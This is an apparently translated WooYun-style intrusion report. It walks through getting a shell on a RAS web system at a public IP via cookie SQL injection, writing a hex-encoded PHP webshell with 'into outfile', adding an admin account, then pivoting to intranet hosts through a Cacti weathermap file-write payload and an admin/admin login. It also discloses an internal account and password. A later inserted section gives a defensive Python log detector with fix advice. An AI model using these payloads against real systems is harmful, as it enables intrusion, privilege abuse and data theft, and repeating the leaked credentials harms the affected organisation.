Getshell on a certain system (successful getshell and intranet roaming)
First, a cookie-based SQL injection:
C:\Python27\sqlmap>sqlmap.py -u "http://218.5.173.228:90/Client/CmxAbout.php" --cookie "RAS_UserInfo_UserName=wooyun" --level 3 -p RAS_UserInfo_UserName --dbms=mysql
Getshell
Previous report: http://*******/bugs/wooyun-2010-0130866
Adding a ' to the cookie discloses the absolute path:
C:\Program Files (x86)\Comexe\RasMini\rasweb\Apache2\htdocs\Smarty-2.6.19\Client\
[Screenshot: absolute path disclosed.]
Getshell:
RAS_UserInfo_UserName=wooyun' and 1=2 union select 0x776F6F79756E3C3F70687020706870696E666F28293B3F3E into outfile 'C:/Program Files (x86)/Comexe/RasMini/rasweb/Apache2/htdocs/smarty-2.6.19/Client/wooyun.php'%23
As can be seen, the earlier report's payload is
0x776F6F79756E3C3F70687020706870696E666F28293B3F3E
which is written to Client/wooyun.php.
It is hex-encoded: strip the 0x and decode it, and it reads wooyun<?php phpinfo();?>.
[Screenshot: written successfully.]
Then take the shell source, hex-encode it in the same way, and write it out. Password wooyun; http://218.5.173.228:90/Client/wooyun2.php is written successfully.
Checking permissions from cmd: running as SYSTEM. Add an administrator account directly, find the port (port 91), and log in successfully.
Run a scanner against the intranet. Found http://10.0.10.38, a CactiEZ (Century Internet) install. Getshell:
/plugins/weathermap/editor.php?plug=0&mapname=sea.php&action=set_map_properties merge m=export m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&region=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=&map_legend=Traffic+Load&map_stamp=Created:+%B+%d+%Y+%H:%M:%S&Records=7&map_linkdefaultbwin=100M&Records=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=[shell content]
Then access it directly at http://10.0.10.38/plugins/weathermap/configs/sea.php, password 0.
I don't know why, but the one-line shell client cannot connect to the server. Confusing.
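Both footholds in this report leave the same kind of trace on the web server: a cookie or query string carrying "union select ... into outfile" with a hex-encoded PHP body, or a weathermap editor.php request whose mapname ends in .php. The following detector is an added example written for this page, not code from the report or from either product. It runs over constructed access-log lines and assumes an Apache LogFormat that appends the Cookie header as a final quoted field; the log lines, IPs and paths are made up for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the report). They assume a
# custom Apache LogFormat that appends the Cookie header as a final quoted
# field:  %h %l %u %t "%r" %>s %b "%{Cookie}i"
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2016:10:00:00 +0800] "GET /Client/CmxAbout.php HTTP/1.1" 200 512 "RAS_UserInfo_UserName=alice"',
    '10.0.0.9 - - [01/Jan/2016:10:00:05 +0800] "GET /Client/CmxAbout.php HTTP/1.1" 500 0 "RAS_UserInfo_UserName=x\' and 1=2 union select 0x3C3F70687020706870696E666F28293B3F3E into outfile \'C:/htdocs/w.php\'%23"',
    '10.0.0.9 - - [01/Jan/2016:10:00:09 +0800] "GET /plugins/weathermap/editor.php?plug=0&mapname=sea.php&action=set_map_properties&item_configtext=x HTTP/1.1" 200 88 "-"',
    '10.0.0.7 - - [01/Jan/2016:10:00:12 +0800] "GET /plugins/weathermap/editor.php?plug=0&mapname=office.conf&action=set_map_properties HTTP/1.1" 200 88 "-"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<cookie>[^"]*)"$'
)
UNION_RE = re.compile(r"union\s+(?:all\s+)?select", re.I)
FILE_WRITE_RE = re.compile(r"into\s+(?:out|dump)file", re.I)
# MySQL hex literal of at least 4 bytes (even number of hex digits).
HEX_RE = re.compile(r"0x((?:[0-9a-f]{2}){4,})", re.I)


def decode_hex_literals(text):
    """Decode every 0x... literal in text the way MySQL would (raw bytes)."""
    return [bytes.fromhex(m.group(1)).decode("latin-1") for m in HEX_RE.finditer(text)]


def query_params(path):
    """Parse the query string of a request path into a dict (first value wins)."""
    params = {}
    for kv in path.partition("?")[2].split("&"):
        if "=" in kv:
            k, v = kv.split("=", 1)
            params.setdefault(k, v)
    return params


def classify(line):
    """Return finding tags for one access-log line; an empty list means clean."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    findings = []
    # URL-decode once so %20 / + / %23 do not hide keywords from the regexes.
    path = unquote_plus(m.group("path"))
    cookie = unquote_plus(m.group("cookie"))
    for where, field in (("query", path), ("cookie", cookie)):
        if UNION_RE.search(field):
            findings.append(f"sqli-union:{where}")
        if FILE_WRITE_RE.search(field):
            findings.append(f"sqli-file-write:{where}")
        # Hex literals sidestep quote filtering; decode them and look for PHP tags.
        if any("<?php" in d.lower() or "<?=" in d for d in decode_hex_literals(field)):
            findings.append(f"hex-php-payload:{where}")
    # Weathermap editor: set_map_properties saves mapname under configs/, so a
    # .php mapname means a PHP file is being dropped inside the web root.
    if "/weathermap/editor.php" in path.lower():
        if query_params(path).get("mapname", "").lower().endswith(".php"):
            findings.append("weathermap-php-write")
    return findings


def scan(lines):
    """Return (line_index, findings) for every line that raised a finding."""
    results = []
    for i, line in enumerate(lines):
        findings = classify(line)
        if findings:
            results.append((i, findings))
    return results


if __name__ == "__main__":
    for i, findings in scan(SAMPLE_LOG):
        print(f"line {i}: {', '.join(findings)}")
```

Running the script flags the second line (union select, file write and a hex literal that decodes to a PHP tag, all in the cookie) and the third (weathermap editor writing sea.php); the benign request and the .conf mapname pass. On the fix side, the cookie value belongs in a prepared statement rather than string concatenation, the web application's MySQL account should not hold the FILE privilege and secure_file_priv should point outside the web root (or disable file export entirely), and the weathermap editor should stay disabled on production Cacti hosts.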
I also found http://10.0.88.91/, weak password admin/admin, and logged in successfully.
Another strange thing: I found that many internal systems are linked to my previous SQL injection report, http://*****/bugs/wooyun-2016-0193268
http://10.0.6.19/eassso/login?service=http%3A%2F%2F10.0.6.19%3A6890%2Feasportal%2FssoWelcome%3FredirectTo%3D%2Findex_sso.jsp
Any announcement jumps to release. I did not go deeper into the server; account sea$, password sea.